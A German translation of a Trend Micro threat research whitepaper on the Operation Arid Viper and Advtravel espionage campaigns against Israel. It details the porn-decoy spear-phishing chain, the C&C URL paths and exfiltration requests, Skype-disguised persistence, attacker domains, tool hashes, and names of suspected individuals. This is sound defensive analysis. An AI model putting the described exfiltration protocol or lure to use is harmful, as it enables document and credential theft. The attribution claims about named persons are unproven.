Operation Arid Viper whitepaper
Transcription
Operation Arid Viper whitepaper
OPERATION ARID VIPER Davor schützt nicht einmal ein Raketenabwehrsystem Ihr Trend Micro Team für Bedrohungsforschung INHALT Einleitung..................................................................................................... i Operation Arid Viper............................................................................... 1 Ziele................................................................................................... 1 Infektionskette.................................................................................... 1 C&C-Infrastruktur............................................................................... 5 Operation Advtravel................................................................................ 9 C&C-Infrastruktur............................................................................... 9 Malware............................................................................................ 13 Opfer................................................................................................ 15 fpupdate.info Server......................................................................... 16 Opfer............................................................................................ 16 linksis.info Server......................................................................... 17 Zuordnungshinweise............................................................................ 17 Khalid Samra.................................................................................... 17 Ahmed Jmal..................................................................................... 19 Mahmoud Hashem........................................................................... 19 Dev_hima......................................................................................... 20 VIRUS_HIMA............................................................................... 24 Mohammed Khaled.......................................................................... 25 Fathy Mostafa.................................................................................. 25 Weitere Personen............................................................................. 26 Fazit.............................................................................................................ii Literaturhinweise........................................................................................iii Anhang.......................................................................................................iv TREND MICRO HAFTUNGSAUSSCHLUSS Die in diesem Dokument bereitgestellten Informa tionen sind lediglich allgemeiner Natur und für Auf klärungs zwecke gedacht. Sie stellen keine Rechts beratung dar und sind nicht als solche auszulegen. Die in diesem Dokument bereit gestellten Informa tionen finden womöglich nicht auf alle Sachverhalte Anwendung und spiegeln womöglich nicht die jüngsten Sachverhalte wider. Die Inhalte in diesem Dokument sind ohne eine Rechtsberatung auf der Grundlage der vorgestellten besonderen Fakten und Umstände nicht als verlässlich oder als Handlungs anweisungen zu verstehen und nicht in anderer Weise auszulegen. Trend Micro behält sich das Recht vor, die Inhalte dieses Dokuments zu jeder Zeit und ohne Vorankündigung zu ändern. Übersetzungen in andere Sprachen sind ausschließ lich als Unterstützung gedacht. Die Genauigkeit der Übersetzung wird weder garantiert noch stillschwei gend zugesichert. Bei Fragen zur Genauigkeit einer Übersetzung lesen Sie bitte in der offiziellen Fassung des Dokuments in der Ursprungs sprache nach. Diskrepanzen oder Abweichungen in der übersetzten Fassung sind nicht bindend und haben im Hinblick auf Compliance oder Durchsetzung keine Rechtswirkung. Trend Micro bemüht sich in diesem Dokument im angemessenen Umfang um die Bereitstellung genauer und aktueller Informationen, übernimmt jedoch hinsichtlich Genauigkeit, Aktualität und Voll ständig keit keine Haftung und macht diesbezüglich keine Zusicherungen. Sie erklären Ihr Einverständnis, dass Sie dieses Dokument und seine Inhalte auf eigene Verantwortung nutzen und sich darauf berufen. Trend Micro übernimmt keine Gewährleistung, weder ausdrücklich noch stillschweigend. Weder Trend Micro noch Dritte, die an der Konzeption, Erstellung oder Bereitstellung dieses Dokuments beteiligt waren, haften für Folgeschäden oder Verluste, insbesondere direkte, indirekte, besondere oder Nebenschäden, entgangenen Gewinn oder besondere Schäden, die sich aus dem Zugriff auf, der Verwendung oder Unmöglichkeit der Verwendung oder in Zusammenhang mit der Verwendung dieses Dokuments oder aus Fehlern und Auslassungen im Inhalt ergeben. Die Verwendung dieser Informationen stellt die Zustimmung zur Nutzung in der vorliegenden Form dar. Forschungsbericht zum Betrug mit der gefälschten Banking-App in Südkrea EINLEITUNG Häufig engagieren sie mehrere Teams, um an unterschiedlichen Abschnitten ihrer bösartigen Programme zu arbeiten. Trend Micro Forscher entdeckten eine laufende Malware-Kampagne, die sich gegen israelische Opfer richtet und Netzwerkinfrastrukturen in Deutschland nutzt. Die Kampagne hat starke Verbindungen zu arabischen Parteien im Gazastreifen und anderen Gebieten. Stellen wir uns die folgende rekonstruierte Situation vor, die auf einem tatsächlichen Angriff basiert: Ein Mitarbeiter einer israelischen staatlichen Forschungs einrichtung empfängt und öffnet eine äußerst gezielte Phishing-E-Mail. Auf dem Bildschirm wird die Wiedergabe eines pornografischen Videos gestartet, das der Mitarbeiter rasch schließt, bevor einer seiner Kollegen etwas davon bemerkt. Danach denkt er nicht weiter über den Zwischenfall nach. Minuten später erhält ein Angreifer irgendwo im Gaza streifen von Palästina die Nachricht, dass das System eines neuen Opfers erfolgreich infiziert wurde. Der Angreifer setzt die Aktion weiter fort, indem er ein Paket mit sämtlichen interessanten Dokumenten aus dem neu infizierten System entwendet. Israel ist weltweit eins der am besten verteidigten Länder, geschützt durch das legendäre Raketen abwehrsystem „Iron Dome“. [1] All das zählt jedoch nicht, wenn ein Angreifer – möglicherweise aus Rache nach den israelischen Luftangriffen auf Gaza im letzten Jahr – all diese Verteidigungsmaßnahmen umgeht, um gezielt das Herz der israelischen Verwaltung anzugreifen. [2] Das Internet entwickelt sich derzeit rasant zum Schlachtfeld für „New Age“-Kriege – ein Schauplatz für ein neues Spiel der Weltmächte, bestehend aus Feinden und Verbündeten. Es ist die Wiederaufnahme des alten Spiels aus Täuschung, Fälschung und Spionage auf der weltpolitischen Bühne. Dieses Spiel bietet die willkommene Möglichkeit, einen Feind ohne explizite Kriegserklärung anzugreifen, indem aus sicherer Entfernung spioniert werden kann – und zwar mit nur minimalen elektronischen Spuren. Die größte Schwierigkeit für ein Sicherheitsunter nehmen besteht darin, die Motivation zu erkennen, die hinter einem elektronischen Angriff steckt. In sel tenen Fällen decken wir Fälle staatlich gesponserter Spionage auf. Folgende Hinweise sind besonders nützlich, um zwischen Angreifern bzw. den Hinter männern höchst gezielter Angriffe und anderen Cyber kriminellen zu unterscheiden: • 2 Komplexität: Einige diese äußerst ge zielten Angriffe sind weitaus raffinierter als gewöhnliche cyberkriminelle Angriffe. Regierungsbehörden mit dem erforderlichen Personal, um Malware für diese äußerst gezielten Angriffe zu entwickeln, perfektio nieren ihren Code oft über Jahre hinweg. Natürlich stehen nicht allen Nationen dieselben Ressourcen zur Verfügung, wenn es um die Entwicklung von Malware geht. Tatsächlich stehen jedem Stuxnet-Angriff Hunderte recht einfacher Spear-Phishing-Kampagnen gegenüber. • Ziele: Mittlerweile greift staatlich finanzierte Malware gezielt Opfer an, die sich in spe zifische Gruppen – bestimmte Regionen oder vertikale Industrien – unterteilen lassen. Dies könnte ein verräterisches Zeichen dafür sein, dass sich hinter einem äußerst gezielten Angriff höhere Ziele als ausschließlich Profitgier verbergen. Darüber hinaus sollte darauf hingewiesen werden, dass nicht alle politisch motivierten Angriffe von den Regierungen ausgeführt werden, die davon am wahrscheinlichsten profitieren würden. Sie können auch das Werk von Hacktivisten, patriotischen HackerGruppen oder – noch komplizierter – von verfeindeten Nationen sein, die Angriffe unter dem Namen der vermeintlich Schuldigen ausführen. Willkommen in der ausgesprochen komplexen Welt geopolitischer Malware! Dieser Forschungsbericht erzählt die Geschichte einer äußerst gezielten Angriffskampagne, die eine ganze Reihe von Alarmglocken schrillen ließ. Was wir als „Operation Arid Viper“ bezeichnen, ist eine Kampagne, die sich ausschließlich gegen Opfer in Israel richtet. Dieser besondere Fall zeigte, dass nicht nur andere Länder Israel im Visier haben, sondern auch einige Organisationen, die sich als Gegner Israels sehen. Wir können daher nicht ignorieren, dass dieser Angriff möglicherweise von einer aggressiven Organisation ausgegangen ist, die versucht, das weltpolitische Schachbrett zu erschüttern. Operation Arid Viper nutzt Malware, die über Phishing-E-Mails verbreitet wird, um Dokumente auf Zielsystemen zu entwenden. Dieser Bericht, der vom Trend Micro Forward-Looking Threat Research Team in Zusammenarbeit mit anderen Sicherheitsexperten erarbeitet wurde, deckt die technischen Details der Kampagne und ihre Ziele auf. Darüber hinaus enthält er Informationen über eine Reihe von Personen, die vermutlich mit der Kampagne in Verbindung stehen. Besonderer Dank gilt dem United States Air Force (USAF) Office of Special Investigations für dessen Unterstützung und Kooperation in dieser Angelegenheit. © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper OPERATION ARID VIPER Ziele Anhand von Trend Micro Bedrohungsdaten wurden die bisherigen Ziele der laufenden Kampagne mit der Bezeichnung „Operation Arid Viper“ ausgemacht. Auf der Basis von IP-Adressen, die im Zusammenhang mit Malware-Infektionen in Verbindung mit der zentralen Infrastruktur der Kampagne standen, konnten wir folgende Ziele ermitteln: ein Regierungsbüro, Transportservice- bzw. Infrastrukturanbieter, eine militärische Organisation und eine akademische Einrichtung in Israel. Zudem wurde eine akademische Einrichtung in Kuwait zusammen mit verschiedenen anderen nicht identifizierten israelischen Personen angegriffen. Recherchen deckten außerdem eine interessante Twitter-Konversation zwischen @Ramzi_MHADHBI, einem tunesischen Blogger, und @waleedassar, einem Reverse Engineer, der zurzeit als Senior Security Researcher beim Al Jazeera Media Network arbeitet, auf. Bei diesem Gespräch wurden zwei der Domains erwähnt, die in Verbindung mit Malware der Operation Arid Viper stehen. Dies spricht dafür, dass möglicherweise eine oder beide Domains ebenfalls angegriffen wurden. Operation Arid Viper richtete sich gegen verschiedene israelische Unternehmen aus unterschiedlichen Branchen. Infektionskette Wie später noch deutlich wird, war es Ziel von Operation Arid Viper, Daten von Opfern zu entwenden. Darüber hinaus wurde viel Aufmerksamkeit auf die Eindringmethode verwendet. Die Kampagne nutzte den gängigsten Infektionsweg gezielter Angriffe: eine einfache Phishing-E-Mail von einem nicht existierenden Absender an einen bestimmten Empfänger. Die E-Mails richteten sich gezielt an Unternehmen aus verschiedenen Branchen mit einem deutlichen Schwerpunkt auf Israel. Die Spear-Phishing-E-Mail wurde zusammen mit einem komprimierten Dateianhang und einem mehr oder weniger glaubwürdigen SocialTwitter-Konversation zwischen Engineering-Trick gesendet, um Opfer zum Öffnen des Anhangs und @Ramzi_MHADHBI und zum Ausführen der eingebetteten .EXE-Datei zu bewegen. Der .RAR@waleedassar Dateianhang enthält eine .SCR-Datei, die bei Ausführung zwei weitere Dateien im infizierten System ablegt. Die eine Datei ist ein kurzes pornografisches Video im .FLV- oder .MPG-Format, je nach untersuchtem Exemplar. Bei der anderen Datei handelt es sich um eine Windows® Binärdatei, die das Symbol des bekannten Internetkommunikationsprogramms Skype™ trägt. Operation Arid Viper zeichnete sich durch eine pornografische Komponente aus, die den Anwender von der Infektion oder der Tatsache, dass etwas Ungewöhnliches geschah, ablenken sollte. Die E-Mails wurden an Mitarbeiter gesendet, die möglicher weise äußerst unangemessene Inhalte am Arbeitsplatz empfingen und daher zögern würden, den Vorfall zu melden. Durch dieses Fehlverhalten der Opfer, nicht auf die Bedrohung zu reagieren, konnte die primäre Malware unentdeckt bleiben. Die Angreifer verwendeten eine besondere, erfolgversprechende und bisher unbekannte Strategie, um Untersuchungen durch Vorfallreaktionsteams zu vermeiden. 1 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Darüber hinaus gab es Variationen bei den Spear-Phishing-Elementen der untersuchten Angriffe, wobei die grundlegende Idee stets die selbe war. Alle Angriffe nutzen eine Social-Engineering-E-Mail mit einem bösartigen Dateianhang und verfügten – wie bereits bei der Beschreibung der Infektionskette erwähnt – über ein pornografisches Element. Nach Ausführung greift die Binärdatei auf einen Command-andControl (C&C)-Server zu, um sofort ein aktualisiertes Modul herunterzuladen und zu überprüfen, ob es sich um ein bereits bekanntes oder ein neu infiziertes System handelt. Jedem infizierten System wird eine eindeutige Kennung zugewiesen, die den jeweiligen Festplattennamen und eine bestimmte Gruppe an Zahlen beinhaltet. Für C&C-Server werden bestimmte URLs verwendet. Beachten Sie, wie häufig die eindeutige Kennung in sämtlichen Kommunikationen mit C&C-Servern verwendet wird. Im Folgenden sehen Sie Beispielbefehle für ein System mit der eindeutigen ID VMwareVirtualIDEHardDrive—1268730784. • /session/aadd_rtemp.php?n=VMwareVirtualIDEHard Drive—1268730784: Datensatz des Systems hinzufügen oder möglicherweise eine Kommunikationssitzung starten • /session/gget_rtemp.php?n=VMwareVirtualIDEHard Drive—1268730784: Datensatz abrufen oder möglicherweise eine Kommunikationssitzung fortsetzen • /flupdate/3.html: Eine aktualisierte .EXE-Datei herunterladen Nicht existierender Sender einer Spear-Phishing-E-Mail [ZENSIERT]@gmail.com SENDET Ursprünglicher E-MailAnhang (selbstextra hierende .RAR-Datei) ENTHÄLT .SCR-Datei, die Dateien in C:\i\ ablegt LEGT AB Ausführbare Datei der Haupt‑Malware (Skype.exe und User-Agent) Pornografisches (harmloses) Video Infektionskette von Operation Arid Viper Obwohl die herunterzuladende Datei 3.html in der ursprüng lichen bösartigen Binärdatei hartkodiert war, verfügt der C&C-Server über ähnliche, jedoch nicht vollkommen identische Binärdateien wie 1.html, 2.html usw. mit fortlaufender Nummerierung. Diese waren von Exemplar zu Exemplar unterschiedlich. Bei allen handelte es sich jedoch um Base64-kodierte Strings. Gewöhnlich stellte die Malware außerdem den User-Agent für die Kommunikation auf „SK“, „Skypee“ oder „Skype“, wie im Wireshark-Protokoll dargestellt. User-Agent für Kommunikation laut Wireshark-Protokoll auf „SK“, „Skypee“ oder „Skype“ eingestellt Die zuvor erwähnten Pfade – aadd_temp und gget_rtemp – wichen in den verschiedenen Exemplaren und C&C-Servern etwas voneinander ab. Das Anfrageformat war jedoch stets identisch. Die folgende unvollständige Liste nennt einige weitere, bereits beobachtete Pfade: 2 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper • /new/add_tree.php?name=[SYSTEM-ID] &date=[TODAYS DATE] • /new/view_flash_random.php?name= [SYSTEM-ID]&serial=[SERIAL NUM] • /new/all_file_info1.php?name=[SYSTEM-ID] &user=[NUM]&file=[DD-MM-YYYY HH‑MM. uml]&type=msn • /new/update.php • /new/view_file_order.php?name=[SYSTEM-ID] • /new/view_file_up.php?name=[SYSTEM-ID] • /new/view_random_order.php?name= [SYSTEM-ID] • /down/add_temp.php?name=[SYSTEM-ID] • /new/add_tuser.php?name=[SYSTEM-ID]&use • /new/chang_flag.php • /new/chang_rfflag.php • /new/chang_rflag.php • /new/all_file_info1.php?name=[SYSTEM-ID] &user=[NUM]&file=[DD-MM-YYYY HH‑MM. rml]&type=log • /new/all_file_info1.php?name=[SYSTEM-ID] &user=[NUM]&file=[DD-MM-YYYY HH‑MM.dll]&type=img • /new/all_file_info1.php?name=[SYSTEM-ID] &user=[NUM]&file=[DD-MM-YYYY HH‑MM.rml]&type=tree • /new/get_flash.php?name=[SYSTEM-ID] &serial=[SERIAL NUM] • /new/n_chang_fflag.php • /new/get_tree.php?name=[SYSTEM-ID] &date=[DD-MM-YYYY] • /mians/aadd_rtemp.php?n=[SYSTEM-ID] • /mians/gget_rtemp.php?n=[SYSTEM-ID] • /new/get_statu.php?name=[SYSTEM-ID] • /session/aadd_rtemp.php?n=[SYSTEM-ID] • new/get_flash.php?name=[SYSTEM-ID] &serial=[SERIAL NUM] • /session/gget_rtemp.php?n=[SYSTEM-ID] Wenn die Malware der zweiten Phase ausgeführt wird, stellt sich diese selbst auf eine automatische Ausführung bei jedem Systemneustart ein – getarnt als Internet kommunikationssoftware. Diese Aktion wird durch einen herkömmlichen Autostart-Registrierungsschlüssel wie HKCU\SOFTWARE\Microsoft\Windows\AktuelleVersion\Run— “Skype = <Pfad\Name.exe”> realisiert. Er enthält den Pfad und Namen der im Registrierungsschlüssel abgelegten .EXEDatei. Zudem kopiert er sich selbst über einen hartkodierten Pfad in %Systemlaufwerk%\Programme\Messenger. Die Malware nutzte „Skype“ nicht nur in der Registrierung, sondern fälschte außerdem häufig auch das Skype-Symbol. Alle bisher untersuchten Malware-Exemplare verfügten über Abschnitte ausführbarer Dateien in arabischer Sprache. Die Malware meldet sich an der C&C-Konsole an, indem sie ein äußerst spezifisches PHP-Script auf dem C&C-Server aufruft: /products/add_user.php?name=VMwareVirtualID EHardDrive—1268730784&user=38. Die Zahl, die für den Benutzerparameter erstellt wird – 38 in diesem Beispiel – wurde vom Malware-Client zur Identifizierung der Sitzung gewählt. Dann durchsucht die Malware die gesamte Festplatte nach Dokumenten mit den Dateiendungen .DOC, .XLS, .PPT und .TXT. Jedes gefundene Dokument wird dem C&C-Server unter Verwendung dieses Formats gemeldet: GET /products/file_order3.php?name=VMwareVirtualIDEH ardDrive—1268730784&path=C:/Documents%20and%20 Settings/user/Templates/winword.doc. 3 | Seite Das Wireshark-Protokoll (oben) zeigt die Dateien, die die Malware an einen C&C-Server sendet. Der Assemblercode-Abschnitt (unten) sucht nach zu stehlenden .XLS‑Dateien. © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Der C&C-Server antwortet umgehend, ob das jeweilige Dokument von Interesse ist oder nicht. Diese Entscheidung beruht wahrscheinlich auf einer serverseitigen, hartkodierten schwarzen Liste, um zu verhindern, dass der Client Standardvorlagen und allgemeine readme.txt-Dateien sendet. Der Server fordert außerdem möglichst nur Dateien an, die nicht bereits während anderer Sitzungen entwendet wurden, um Dateiduplikate zu vermeiden. Der Server gibt zwei mögliche Antworten aus: • Antwort bei einem interessanten Dokument: HTTP/1.1 200 OK Date: Thu, 02 Oct 2014 14:49:45 GMT Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_ bwlimited/1.4 X-Powered-By: PHP/5.5.16 Transfer-Encoding: chunked Content-Type: text/html 4 6 done 0 • Antwort bei einem uninteressanten Dokument: HTTP/1.1 200 OK Date: Thu, 02 Oct 2014 14:49:23 GMT Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_ bwlimited/1.4 X-Powered-By: PHP/5.5.16 Transfer-Encoding: chunked Content-Type: text/html 2 2 Danach führt der Client alle relevanten, zu stehlenden Dokumente auf. Diese werden in einer 0.txt-Datei komprimiert und über eine POST-Anfrage wie POST /products/ fupdates.php auf den C&C-Server hochgeladen. Diese Anfrage beinhaltet einen einzigen POST-Parameter, der als GET-Parameter wie account=38&name= VMwareVirtualIDEHardDrive—1268730784&folder=tree&fname=02-10-2014 10-50.rml&s=<base64-file> formatiert ist. Der Server nutzt vermutlich den Wert account, der mit dem zuvor erwähnten Wert user identisch ist. So können Sitzungen nachverfolgt werden, in denen bestimmte Dateien hochgeladen werden. Der Parameter fname ist der Name der .ZIP-Datei und enthält ein bestimmtes Datum und eine bestimmte Uhrzeit. Die Datei 0.txt wird nach dem Upload gelöscht. Zum Abschluss des Datei-Uploads sendet der Client die Anfrage /products/all_file_ info1.php?name=VMwareVirtualIDEHardDrive—1268730784&user=38&file= 02-10-2014%2010-50.rml&type=tree, um sicherzustellen, dass der Vorgang erfolgreich durchgeführt wurde. Mit einer einzigen Ausführung kann die Malware also Dokumente von infizierten Systemen entwenden. Nach Ausführung sämtlicher Routinen fragt die Malware automatisch beim C&C-Server nach, ob der Pfad /products/get_statu.php?name= VMwareVirtualIDEHardDrive—1268730784 weiter ausgeführt werden soll. Beinhaltet die Antwort den Wert run11, soll die Ausführung fortgesetzt werden. Bei der Antwort stop wird die Ausführung deaktiviert – wahrscheinlich, um uninteressante Systeme nicht zu infizieren. 4 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper C&C-Infrastruktur Anhand eines ersten Malware-Exemplars und des entsprechenden C&CServers durchsuchten wir die internen Datenbanken von Trend Micro, um eine Liste mit ähnlichen Malware-Exemplaren zu erstellen, die denselben Server kontaktieren. In allen Fällen zeigte die Malware im Wesentlichen dasselbe bereits erwähnte Verhalten. Der C&C-Server, der zuerst entdeckt wurde, war pstcmedia.com. Eine schnelle Suche ergab, dass außerdem die Website mixedwork.com, die auch auf der IP-Adresse 188.40.81.136 gehostet wurde, als C&CServer diente. Obwohl die Website pstcmedia.com die IP-Adressen wechselte, schien mixedwork.com auf dieser ursprünglichen IP-Adresse zu verbleiben. Andere von pstcmedia.com genutzte IP-Adressen lauteten unter anderem 192.254.132.26 und 54.255.143.112. Die zweite IPAdresse wurde von anderen Sicherheitsforschern entlarvt. Um weitere Domains zu finden, die möglicherweise an derselben Kampagne beteiligt sind oder von denselben Tätern genutzt werden, wurde eine Untersuchung von Domain-Registrierungsdaten durchgeführt. Der C&C-Server, der pstcmedia.com verwendete, war unter der privaten E-Mail-Adresse khalid.samraa@gmail.com registriert. Weitere Details hierzu enthält der Abschnitt „Zuordnungshinweise“. Die Hauptseite von mixedwork.com beinhaltete außerdem eine „Köder umleitung“ zu der rechtmäßigen Website http://channel9.msdn.com/ events/mix. Erwähnenswert ist jedoch, dass auf der 404-Fehlerseite als Website-Administrator die E-Mail-Adresse [email protected] genannt wird. Durch eine eingehende Untersuchung von Trend Micro™ Smart Protection Network™ Feedback zu Netzwerkaktivitäten, die mit den zuvor erwähnten URL-Pfaden vergleichbar sind, konnten wir erkennen, wo sich die folgenden aktiven C&C-Server zu verschiedenen Zeitpunkten befanden: • ahmedfaiez.info • flushupdate.com • flushupate.com • ineltdriver.info • mediahitech.com Die ersten drei Server wurden bereits alle irgendwann einmal auf denselben IP-Adressen 188.40.75.132 und 188.40.106.84 mit Standort in Hetzner, Deutschland, gehostet. Eine genauere Untersuchung der ersten IP-Adresse ergab, dass diese neben verschiedenen anderen auch die zwei Domains advtravel.info und fpupdate.info hostet. Diese beiden Domains haben eindeutige Verbindungen zu cyberkriminellen Aktivitäten – wenn auch nicht unbedingt zu der hier untersuchten Kampagne. Bei genauerer Betrachtung der beiden C&C-Server zeigte sich, dass diese falsch konfiguriert waren und das Erstellen von Verzeichnislisten zuließen. Sie speicherten große Datenmengen von Opfern, die im Abschnitt „Operation Advtravel“ näher analysiert werden. 5 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Maltego®-Karte mit Beziehungen, die zwischen Websites, IP-Adressen und Servern in den beschriebenen Kampagnen erkannt wurden Die wesentlichen C&C-Server von Operation Arid Viper sind so konfiguriert, dass Besucher auf ihren Hauptseiten zu anderen Webseiten weitergeleitet wurden (siehe unten stehende Tabelle). C&C-Server Website, auf die weitergeleitet wird ahmedfaiez.info Zeigt nur das Wort „test“ an flushupate.com helpx.adobe.com/flash-player.html flushupdate.com get.adobe.com/flashplayer ineltdriver.com downloadcenter.intel.com/default.aspx mediahitech.info Wird nicht mehr aufgelöst mixedwork.com visitmix.com/work plmedgroup.com palmgroupasia.com pstcmedia.com Geparkte Seite 6 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Eine Prüfung der Domain Name System (DNS) Start of Authority (SOA)- und WhoisDatensätze jedes identifizierten C&C-Servers erbrachte verschiedene weitere interessante E-Mail-Adressen. Weitere Details hierzu finden Sie im Abschnitt „Zuordnungshinweise“. Die folgende Tabelle zeigt unsere Ergebnisse. C&C-Server advtravel.info* E-Mail-Adressen aus DNS SOAund Whois-Datensätzen [email protected] [email protected] ahmedfaiez.info [email protected] flushupate.com [email protected] flushupdate.com [email protected] [email protected] fpupdate.info* [email protected] ineltdriver.com [email protected] mediahitech.info [email protected] mixedwork.com [email protected] plmedgroup.com [email protected] pstcmedia.com [email protected] Beachten Sie, dass die durch ein Sternchen (*) gekennzeichneten C&C-Servernamen Teil einer separaten Kampagne (Advtravel) sind. 7 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper Q1Q2Q3 Q4 Erstes gefundenes Exemplar User-Agent: Httpcall, MyProgramm Neue User-Agents: SK, sk, Skypee, Skype Q1Q2 Q3 Q4 Kampagne fortgesetzt Starke Zunahme von Angriffen Malware mit neuen Binärdateien, die jedoch weiterhin dieselbe Backend-Infrastruktur nutzten Wenig Malware-Aktivitäten aufgrund der Sommerferien Die Hashwerte schädlicher Binärdateien und die entsprechenden C&C-Server zusammen mit dem jeweiligen Erkennungsdatum ermöglichten uns die Darstellung von Angriffen auf einer Zeitleiste. Diese zeigt die zeitliche Entwicklung von Operation Arid Viper. 8 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper OPERATION ADVTRAVEL Die laufende Operation Advtravel unterscheidet sich von der Operation Arid Viper durch die verwendete Malware, die Opfer und die Zuordnungsinformationen. Dennoch gibt es gewisse Parallelen zur Operation Arid Viper, die uns dazu veranlasst haben, die Operation Advtravel in diesen Forschungsbericht aufzunehmen. Die hinter dieser Kampagne stehenden Täter haben möglicherweise Verbindungen zu den Cyberkriminellen der Operation Arid Viper. Beispiele: • Sie nutzten gemeinsame C&C-Server. • Sie verwendeten dieselben E-Mail-Adressen, um ihre Domains advtravel.info, fpupdate.info und linksis.info zu registrieren. • Die Täter hatten Verbindungen zum Gazastreifen. C&C-Infrastruktur Während unserer Untersuchungen stießen wir auf einen C&C-Server von Advtravel, der dieselbe Infrastruktur wie Operation Arid Viper nutzte. Besonders interessant ist, dass auf der Website advtravel.info das Stammverzeichnis des Servers für die Öffentlichkeit vollständig zugänglich blieb. Diese Tatsache zusammen mit einigen anderen cyberkriminellen Aktivitäten, die im Abschnitt „Zuordnungshinweise“ näher erläutert werden, bewegten uns zu der Annahme, dass die Advtravel-Angreifer weniger erfahren sind als die Kriminellen, die sich hinter der Operation Arid Viper verbergen. Öffentlich zugängliches Stammverzeichnis der Advtravel-Website Eine Analyse von Daten aus dem Dezember 2014 zeigt, dass auf das C&C-Serververzeichnis von Advtravel öffentlich zugegriffen werden konnte. Im Rahmen unserer Untersuchung konnten wir daher Kopien des gesamten Inhalts herunterladen, bevor die Betreiber des C&C-Servers ihren Fehler bemerkten und den Zugriff sperrten. Frühere Datenversionen aus dem September 2014 wurden ebenfalls heruntergeladen. Das advtravel.info-Verzeichnis verfügte über verschiedene Dateien und Ordner. Obwohl es uns nicht möglich war, jede Datei eingehend zu analysieren, werden im Folgenden einige Details zu den interessantesten Komponenten näher erläutert: • B1312.zip: Hierbei handelt es sich um eine komprimierte Sicherungsdatei (1,4 GB) von sämtlichen Dateien auf dem C&C-Server. Da diese Datei auf dem Server verblieb, konnten wir einen Einblick in den Code der von den Angreifern verwendeten .PHP-Dateien erlangen. • /apps/: Dieses Hauptverzeichnis enthält gestohlene Daten von Opfern zusammen mit verschiedenen PHP-Skripten zum Hochladen der Daten auf den Server. Das verwendete Format war /apps/A[3 nums]X/ [COMPUTERNAME_USERNAME], wobei A[3 nums]X für eine bestimmte untergeordnete Kampagne steht, während /[COMPUTERNAME_ USERNAME] ein eindeutiges Opfer identifiziert. Die drei Ziffern im Ordnerformat lassen vermuten, dass es sich hier um die Angabe des jeweiligen Monats im Jahr handelt, da die Zahlen von 001 bis 012 variierten. Eine nähere Untersuchung der Termine, an denen die Daten gestohlen wurden, widerlegte jedoch diese Theorie. 9 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper DrivesList.txt: Liste sämtlicher Laufwerke eines infizierten Systems. Eine umfangreiche Analyse jeder Datei auf dem Server würde den Rahmen dieses Forschungsberichts überschreiten. Im Folgenden finden Sie jedoch nähere Informationen zu den interessantesten Komponenten: FileList.txt: Liste von Dateien in einem Verzeichnis eines infizierten Systems – häufig, wo die Malware ausgeführt wurde. /apps/A[3 nums]X/ison.on: Zeitpunkt im Format tt-mm-jjjj-hh-mm-ss, an dem gestohlene Daten zuletzt hochgeladen wurden. pdata.txt: Liste gestohlener WebsiteAnmeldedaten. webrowser.txt: Liste gestohlener Webbrowser-Anmeldedaten. /apps/A[3 nums]X/data/: Enthält Screenshots von infizierten Systemen zusammen mit folgenden Dateien, deren Präsenz je nach Opfer variierte: wifi.txt: Liste gestohlener Anmelde daten für WLAN-Verbindungen. workdata.txt: Beinhaltet Infektions datum, Betriebssystem, Benutzer domainname und die Zeile APP_PATH=, die angibt, in welchem Verzeichnis die Malware installiert wurde. allips.txt: Beinhaltet die lokalen und externen IP-Adressen von Opfern. CurrentProcess.txt: Liste der laufenden Prozesse auf infizierten Systemen. Winkey.log: Protokoll mit Tastatur eingaben von Opfern. cmpinf.txt: Beinhaltet Infektionsdatum, Betriebssystem, Benutzerdomainname und Benutzername. Weitere Dateien, die von der Malware aufgrund einer manuellen Anforderung des Angreifers direkt vom System des Opfers gestohlen wurden. Hierzu zählen Dokumente, Bilder usw. downinf.txt: Beinhaltet Infektions datum, Betriebssystem, Benutzer domainname, Benutzername und Status wie „Download Complete :).“ /data/: Beinhaltet drei .EXE-Dateien (siehe folgende Tabelle). Dateiname getchr.exe getcmppass. exe MD5-Hash Zweck 77f590608eadcbbcc07de8d26607611f Legt HKTL_ PASSVIEW ab 6d63f1c6962f290156c6459d1158a715 Hacking-Tool, das Browser- und WLAN-Netzwerk kennwörter entwendet ccaac14d265915f4fdc6229ec6c9e854 log.exe b9b763980e33e390480c4a0d7c63adec Protokolliert Tastatureingaben Index mit über 400 infizierten Systemen aus nur einer untergeordneten Kampagne /del/: Verfügt über dasselbe Format wie der Ordner /apps/ und beinhaltet ebenfalls gestohlene Daten von Opfern, insbesondere Bilder, Dokumente und Kennwörter. 10 | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper /downs/: Beinhaltet verschiedene Tools wie die im Ordner /apps/ (siehe folgende Tabelle). Dateiname MD5-Hash Zweck Mkhaled.txt b2690a9ac508cfe49f9db76695e18f00 Umfasst den Text https://www. facebook.com/messages/ LODALODALODA, der eine Facebook-Nachricht an Mohamed Khaled (https://www.facebook.com/ LODALODALODA) sendet aa.bat 1e63925edff6ea3449b7d3468443a52f Kopiert pat2.exe und patver.tmp aus dem Order \appdata\roaming\explr\ appnew.exe ef5a37a6dcb1c417f4324730ce56be48 Backdoor, die auf den C&C-Server devhelx.no-ip.org zugreift appsrv.exe 2da94e47a68d9a137504106a513a3559 Backdoor, die auf den C&C-Server devhelx.no-ip.org zugreift estad.scr d6951e596910ec6105512ed002f24aa1 Lädt pat2.exe hinunter ez.exe 293d37cf8c62076de739f4bd68e685bb Backdoor, die auf den C&C-Server devhelx.no-ip.org zugreift kms.rar 6fa049b83def6c41154558c706b6605d Hacking-Tool in Form einer kennwortgeschützten Archivdatei log.exe ccaac14d265915f4fdc6229ec6c9e854 Legt die Protokolldatei WinKey.log ab, in der Tastatureingaben proto kolliert werden out.rar c69bb266bede466825f21d900453f45e .ZIP-Datei einschließlich der Datei pswd2.exe (erkannt als TROJ_STRPADT.A) pswd2.exe 0472d67eadb9aaa0491398bd14f6229f Legt .TXT-Datei ab, die URLs, Benutzernamen und Kennwörter 